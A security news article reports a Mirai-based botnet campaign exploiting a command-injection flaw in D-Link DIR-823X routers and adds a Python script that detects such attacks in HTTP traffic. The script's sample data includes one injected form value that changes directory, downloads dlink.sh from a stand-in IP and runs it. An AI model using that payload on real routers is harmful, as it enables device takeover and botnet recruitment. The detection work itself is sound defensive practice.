A new Mirai-based malware campaign is exploiting CVE-2025-29635 in D-Link DIR-823X routers to recruit devices into a botnet, with Akamai saying it saw active exploitation attempts in March 2026 and that the flaw had not previously been observed in the wild.
KEY FACTS
- Vulnerability: CVE-2025-29635 is a command-injection flaw that can allow remote command execution.
- Target: The issue affects D-Link DIR-823X routers running firmware versions 240126 and 24082.
- Payload: Attackers downloaded a shell script named dlink.sh that installed Mirai malware called tuxnokill.
- Scope: The same attack pattern also targeted TP-Link and ZTE routers, the report says.
Akamai’s technical analysis says the exploitation attempts began in early March 2026 and used POST requests to the /goform/set_prohibiting endpoint. The requests changed directories across writable paths, downloaded the script from an external IP and then executed it.
The payload installs a Mirai-based malware strain that supports multiple architectures and includes standard distributed denial-of-service tools such as TCP SYN, TCP ACK, STOMP, UDP floods and HTTP null attacks. The researchers said the same campaign also exploited CVE-2023-1389 in TP-Link routers and a separate remote code execution flaw in ZTE ZXV10 H108L devices.
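The request pattern Akamai describes (a POST to /goform/set_prohibiting whose form values carry a directory change, a download from an external host and an execution step) is something a defender can look for in captured HTTP traffic from a router's management interface. The following is an added detection example, not code from Akamai or from the article; the endpoint and the dlink.sh name are taken from the report, while the form field name `url`, the TEST-NET address 203.0.113.5 and all sample requests are constructed for illustration.

```python
import re
from urllib.parse import quote_plus, unquote_plus

# Endpoint and script name quoted in the Akamai report; everything else in this
# file (field names, addresses, sample requests) is constructed for the example.
TARGET_ENDPOINT = "/goform/set_prohibiting"
KNOWN_SCRIPT = "dlink.sh"

# Generic command-injection heuristics applied to *decoded* form values.
SHELL_META = re.compile(r"(;|\|\||&&|\||`|\$\()")
DIR_WALK = re.compile(r"\bcd\s+/(tmp|var|dev|mnt)\b")
REMOTE_FETCH = re.compile(
    r"\b(wget|curl|tftp|ftpget)\b.*?(https?://|\d{1,3}(\.\d{1,3}){3})", re.I)
EXEC_STAGE = re.compile(r"(^|[;|&\s])(sh|\./\S+|chmod\s+(\+x|[0-7]{3,4}))\b")


def decode_form(body):
    """Split an application/x-www-form-urlencoded body into decoded (name, value) pairs.

    Splitting is done by hand on '&' only, so a ';' in a value stays in the value
    (older parse_qs versions would treat it as a separator and hide the injection).
    """
    fields = []
    for pair in body.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        fields.append((unquote_plus(name), unquote_plus(value)))
    return fields


def analyze_request(method, path, body=""):
    """Return the list of indicators raised by one HTTP request."""
    indicators = []
    if path.split("?", 1)[0] != TARGET_ENDPOINT:
        return indicators
    indicators.append("target_endpoint")
    if method.upper() != "POST":
        return indicators
    for name, value in decode_form(body):
        if SHELL_META.search(value):
            indicators.append("shell_metachar:" + name)
        if DIR_WALK.search(value):
            indicators.append("cd_writable_path:" + name)
        if REMOTE_FETCH.search(value):
            indicators.append("remote_download:" + name)
        if EXEC_STAGE.search(value):
            indicators.append("exec_stage:" + name)
        if KNOWN_SCRIPT in value:
            indicators.append("known_script_name:" + name)
    return indicators


def severity(indicators):
    """Map indicators to a triage level. A bare endpoint hit is only informational:
    legitimate admin sessions use the same form, so it is the injected content that
    separates an attack from a configuration change."""
    has = lambda prefix: any(i.startswith(prefix) for i in indicators)
    if "target_endpoint" not in indicators:
        return "none"
    if has("remote_download") or has("known_script_name"):
        return "high"
    if has("shell_metachar") or has("cd_writable_path") or has("exec_stage"):
        return "medium"
    return "info"


def scan(requests):
    """Run the analysis over (method, path, body) tuples; returns (severity, indicators)."""
    results = []
    for method, path, body in requests:
        ind = analyze_request(method, path, body)
        results.append((severity(ind), ind))
    return results


# Constructed sample traffic (not real captures).
SAMPLE_REQUESTS = [
    # Ordinary settings change through the same form.
    ("POST", "/goform/set_prohibiting", "prohibiting=1&url=example.com"),
    # Unrelated endpoint, should not be flagged.
    ("GET", "/goform/get_status", ""),
    # Injection-shaped value, URL-encoded the way a browser or client would send it.
    ("POST", "/goform/set_prohibiting",
     "url=" + quote_plus("example.com; cd /tmp; wget http://203.0.113.5/dlink.sh; sh dlink.sh")),
]

if __name__ == "__main__":
    for (method, path, _), (level, ind) in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(f"{level:6} {method} {path} {ind}")
```

The decode-before-match step matters: the metacharacters are URL-encoded on the wire, so a rule that greps the raw body for `;` or `wget` misses them. On a router that is supposed to have remote administration disabled, any hit on this endpoint from a WAN-side source is worth reviewing regardless of the computed level.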
The flaw was first disclosed 13 months ago by two researchers, who briefly published a proof-of-concept exploit before retracting it. The affected D-Link routers reached end of life in November 2024, and the report says the latest firmware is unlikely to address CVE-2025-29635.
WHY IT MATTERS
The campaign shows how end-of-life routers can remain exposed long after disclosure, especially when no patch is expected. Users are being advised to replace unsupported hardware, turn off remote administration if it is not needed, change default passwords and watch for configuration changes.